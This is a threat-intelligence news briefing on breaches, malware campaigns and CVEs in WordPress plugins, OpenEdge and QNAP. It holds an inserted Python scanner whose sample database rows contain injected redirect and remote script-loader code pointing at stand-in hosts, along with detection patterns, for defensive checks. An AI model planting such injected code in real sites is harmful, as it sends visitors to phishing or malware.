
Cyware Daily Threat Intelligence

Daily Threat Briefing Mar 11, 2024

Planning to hop to Notion? Watch out! Malicious MSIX installers have been discovered mimicking the Notion app. Caution is urged as similar tactics may target Slack, WinRar, and Bandicam. Amidst the vulnerability landscape in WordPress plugins, the Ultimate Member plugin faces a critical XSS flaw, posing a risk of unauthorized access. Concurrently, a fresh cyberattack campaign that took off in the past few weeks is targeting the Popup Builder plugin.

Back to malware updates, a new ransomware variant has emerged to hit organizations in the U.S. and Europe. Dubbed DoNex, the actors behind it have listed five companies as their victims. Additionally, QNAP disclosed sensitive vulnerabilities in its systems, posing security risks.

Top Breaches Reported in the Last 24 Hours

Millions of customer records put on sale

Financial services firm Paysign is investigating reports of a data breach after hackers attempted to sell a database allegedly containing millions of customer records. A cybercriminal forum user named "emo" claimed to have stolen over 1.2 million records, including customer names, addresses, dates of birth, phone numbers, and account balances. The company emphasized its commitment to customer data security but provided no further details on the incident.

Leicester City Council paralyzed by attack

Leicester City Council's IT systems and phone lines were knocked offline due to a cyberattack. Emergency phone lines have been established for urgent assistance, while residents are directed to the council's website for information. Councillors express concern over the severity and duration of the outage, with plans to discuss the matter at the Audit and Risk Committee. The council has apologized for the inconvenience and assured efforts to minimize disruption to frontline services.

Top Malware Reported in the Last 24 Hours

MSIX malware disguised as Notion installer

A deceptive scheme has emerged wherein MSIX malware masquerades as the legitimate Notion installer and is distributed through a website resembling the official Notion homepage. Upon downloading, the file named 'Notion-x86.msix' appears to be signed with a valid certificate, further deceiving users. However, upon installation, malicious scripts are deployed, including StartingScriptWrapper.ps1 and refresh.ps1, the latter being the malware responsible for downloading commands from a C2 server.

Enterprises grapple with DoNex ransomware threat

Enterprises in the U.S. and Europe are facing heightened concerns due to the emergence of the DoNex ransomware strain. The group employs double-extortion tactics, encrypting files and exfiltrating sensitive data to increase pressure on victims. While the attackers’ exact infiltration methods remain undisclosed, cybersecurity teams are actively investigating to uncover DoNex's modus operandi. The group has already leaked data from at least five companies.

BianLian ransomware exploits TeamCity flaws

BianLian ransomware operators were observed leveraging security holes in JetBrains TeamCity software, deploying a PowerShell variant of their Go backdoor. GuidePoint Security's report outlines the attack chain, including initial access via CVE-2024-27198 or CVE-2023-42793, creating new users, and running malicious commands for post-exploitation and lateral movement. Operators implant custom Go-based backdoors tailored to victims and deploy remote desktop tools like AnyDesk.

Matanbuchus malware exploits XLS files

The Matanbuchus malware launched a fresh campaign targeting Windows systems through malicious XLS files. The malware's sophistication allows it to fetch JavaScript files and download malicious DLLs, initiating potential cascaded infections. Notably, the malware strain is used in association with Cobalt Strike beacons, enhancing threat actors' control over compromised systems.

Top Vulnerabilities Reported in the Last 24 Hours

WordPress plugin patched for XSS flaw

A stored XSS vulnerability (CVE-2024-2123) was discovered in the Ultimate Member WordPress plugin, affecting versions up to 2.8.3. Reported through the Wordfence Bug Bounty Program, the flaw could allow unauthenticated attackers to inject malicious scripts. Furthermore, unauthenticated attackers could potentially leverage the flaw to gain administrative user access on sites running the vulnerable plugin. Users are urged to update immediately to ensure protection.

Attackers continue to target Popup Builder

Sucuri reported a cybercrime group exploiting outdated versions of the Popup Builder plugin for WordPress. So far, it has injected code into over 3,300 WordPress websites. The injected code, stored in the 'wp_postmeta' database table, manipulates Popup Builder plugin events to execute actions such as redirecting visitors to phishing or malware sites. Sucuri identified injection points in the WordPress admin interface's Custom JavaScript or Custom CSS sections.
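A defender-side check for the injection described above, added here as an example and not code from Sucuri or the briefing: it scans a wp_postmeta table for Popup Builder custom JavaScript/CSS entries containing redirect or remote-loader code. The meta key names, the indicator patterns, and the sample rows are assumptions constructed for the example, not values taken from the campaign.

```python
import re
import sqlite3

# Constructed sample of a wp_postmeta table (not real data from the briefing).
SAMPLE_ROWS = [
    (1, 101, "sg_popup_custom_js", "jQuery('#popup').on('sgpbDidOpen', function(){ /* show banner */ });"),
    (2, 101, "sg_popup_custom_css", ".sgpb-popup { color: red; }"),
    (3, 102, "sg_popup_custom_js", "window.location.href='http://malicious.example/redirect';"),
    (4, 103, "sg_popup_custom_js", "var s=document.createElement('script');s.src='//evil.example/x.js';document.head.appendChild(s);"),
    (5, 104, "_edit_lock", "1710000000:1"),
]

# Assumption: the meta keys holding Popup Builder's Custom JavaScript / Custom CSS
# contain 'popup' and 'custom_js' / 'custom_css'; adjust to the real key names.
KEY_PATTERN = re.compile(r"popup.*custom_(js|css)", re.I)

# Indicators of injected redirect or remote-loader code in the custom sections.
SUSPICIOUS = [
    re.compile(r"window\.location(\.href)?\s*=", re.I),        # forced redirect
    re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),  # dynamic script loader
    re.compile(r"https?://|//[a-z0-9.-]+\.[a-z]{2,}", re.I),     # external URL
    re.compile(r"\beval\(|atob\(|fromCharCode", re.I),          # obfuscation helpers
]

def load_sample(conn):
    """Create the constructed wp_postmeta table in the given SQLite connection."""
    conn.execute("CREATE TABLE wp_postmeta (meta_id INTEGER, post_id INTEGER, meta_key TEXT, meta_value TEXT)")
    conn.executemany("INSERT INTO wp_postmeta VALUES (?,?,?,?)", SAMPLE_ROWS)

def find_injected_popups(conn):
    """Return (post_id, meta_key, matched indicator) for suspicious custom-code rows."""
    hits = []
    for post_id, key, value in conn.execute("SELECT post_id, meta_key, meta_value FROM wp_postmeta"):
        if not KEY_PATTERN.search(key or ""):
            continue  # not a Popup Builder custom JS/CSS entry
        for pat in SUSPICIOUS:
            match = pat.search(value or "")
            if match:
                hits.append((post_id, key, match.group(0)))
                break
    return hits

def scan_sample():
    """Load the constructed table into memory and return the flagged rows."""
    conn = sqlite3.connect(":memory:")
    load_sample(conn)
    return find_injected_popups(conn)

if __name__ == "__main__":
    for hit in scan_sample():
        print("suspicious Popup Builder custom code in post", *hit)
```

Against a live site, point the connection at a MySQL dump or replace the SQLite connection with the WordPress database connection and review every flagged post in the Popup Builder admin screens.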

Authentication bypass bug grips Progress Software

A critical security flaw (CVE-2024-1403) has been discovered in Progress Software OpenEdge Authentication Gateway and AdminServer. With a maximum CVSS severity rating of 10.0, the vulnerability affects OpenEdge versions 11.7.18 and earlier, 12.2.13 and earlier, and 12.8.0. Exploiting this flaw allows unauthorized access by bypassing authentication protections. Horizon3[.]ai has reverse-engineered the AdminServer service, providing a PoC exploit highlighting potential avenues for unauthorized access and potential RCE.

QNAP devices vulnerable to critical flaws

QNAP disclosed critical vulnerabilities, including CVE-2024-21899, CVE-2024-21900, and CVE-2024-21901, that allow unauthorized access, arbitrary command execution, and SQL injection attacks, respectively. Affected versions include QTS 5.1.x, QTS 4.5.x, QuTS hero h5.1.x, QuTS hero h4.5.x, QuTScloud c5.x, and myQNAPcloud 1.0.x. QNAP urged users to update their systems immediately to mitigate potential threats.